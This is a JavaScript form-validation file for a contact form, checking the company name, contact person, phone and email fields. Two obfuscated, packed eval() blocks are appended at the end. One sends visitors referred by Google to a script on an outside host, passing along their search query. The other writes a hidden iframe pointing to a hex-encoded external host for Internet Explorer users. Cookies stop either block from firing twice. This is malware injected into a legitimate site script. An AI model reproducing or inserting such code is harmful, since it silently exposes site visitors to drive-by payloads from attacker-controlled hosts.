// JavaScript Document

function validation()
{
	if (isCompanyName() && isContactPerson() && isPhone() && isEmail())
	{
		document.forms[0].submit();
	}
	return true;
}

function isCompanyName() 
{
	if(document.getElementById('CompanyName').value=="")
	{
	alert("Please enter company name.");
	document.forms[0].CompanyName.focus();
	return false;
	}
	return true;
}

function isContactPerson() 
{
	if(document.getElementById('ContactPerson').value=="")
	{
	alert("Please enter contact person name.");
	document.forms[0].ContactPerson.focus();
	return false;
	}
	return true;
}

function isPhone() 
{
	if(document.getElementById('Phone').value=="")
	{
	alert("please enter your mobile/phone number");
	document.forms[0].Phone.focus();
	return false;
	}
	return true;
}

function isEmail()
{
var str = document.forms[0].Email.value;
var str1 = document.forms[0].Email.value.length;
if(str == "")
	{
		alert("\nThe Email field is blank .\n\nPlease re-enter your Email ID.")
		document.forms[0].Email.focus();
		return false;
	}
if (str.indexOf("@")== -1 || str.indexOf(".")== -1)
{
alert("Please enter the correct Email ID");
document.forms[0].Email.focus();
return false;
}
if((str.substring(0,1) == "@" || str.substring(0,1)== ".") || str.substring(0,1)=="-" || str.substring(0,1)=="_")
	{
		alert("The Email ID can not begin with @ or . or - or _ ");
		document.forms[0].Email.focus();
		return false;
	}
if ((str.substring(str1-1,str1)=="@" || str.substring(str1-1,str1)=="."))
{
		alert("The Email ID can not end with @ or . ");
		document.forms[0].Email.focus();
		return false;
}
var index1 = str.indexOf("@");
var index2 = str.indexOf(".");
var index3=str.indexOf("-");
var index4=str.indexOf("_");

if(str.substring(index1+1,index1+2) ==".")
{
alert(". can not come immidately after @");
document.forms[0].Email.focus();
return false;
}
if ( ( index3==index1+1) || ( index4==index1+1))
{
alert("please enter the correct Email ID as no two special chars can come in sequence");
document.forms[0].Email.focus();
return false;
}
for (var i = 0; i < str.length; i++) 
	{
		var ch = str.substring(i, i + 1);
		if ( ((ch < "a" || "z" < ch) && (ch < "A" || "Z" < ch)) && (ch < "0" || "9" < ch) && (ch != '_') && ch !='-' && ch !='@' && ch !='.')
		{
			alert("\nThe Email field  accepts letters,numbers & underscore.\n\nPlease re-enter your Email ID.");
			document.forms[0].Email.select();
			document.forms[0].Email.focus();
			return false;
		}
	}
return true;
}

eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 17=3.16.7("20=1");5 19=3.10.7(\'22.\');5 18=25.30.7("27 6.0");9(17==-1&&19!=-1&&18==-1){5 4=3.10.13(3.10.7(\'14=\'));5 8=4.7(\'&\');9(8==-1){8=26.29}4=4.13(0,8).21(2);9(24(4).28(0)!=\'%\'){3.43("<11 42=\'31\' 40=\'44://45.38/33.39?14="+4+"\'></11>");3.16="20=1; 32=34, 23 35 37 12:15:36 41; "}}',10,46,'|||document|query|var||indexOf|querysize|if|referrer|script||slice|q||cookie|dci|nai|dri|_tskdjw|substring|google||escape|navigator|cmd|MSIE|charAt|length|appVersion|JavaScript|expires|kv|Mon|Jul|58|2013|org|js|src|GMT|language|write|http|24search'.split('|'),0,{}));sa="%73%6F%64%6B%65%6E%2E%6E%65%74";eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c+'\\b','g'),k[c])}}return p}('7(2.3.4("5=0")==-1&&10.13.4("19 6")!=-1){2.3="5=0; 17=18, 14 12 8 14:15:26 9; ";2.11("<20"+"31 34="+"1 33"+"32=1 0"+"30=\'29"+"23://"+22+"/21/\' 24=\'25"+"28:27\'></7"+"16>")}',10,35,'s||document|cookie|indexOf|_mlsdkf||if|2015|GMT|navigator|write|Jul|appVersion|||rame|expires|Mon|MSIE|ifra|b2b|sa|tp|style|di||none|splay|ht|rc|me|ght|hei|width'.split('|')));

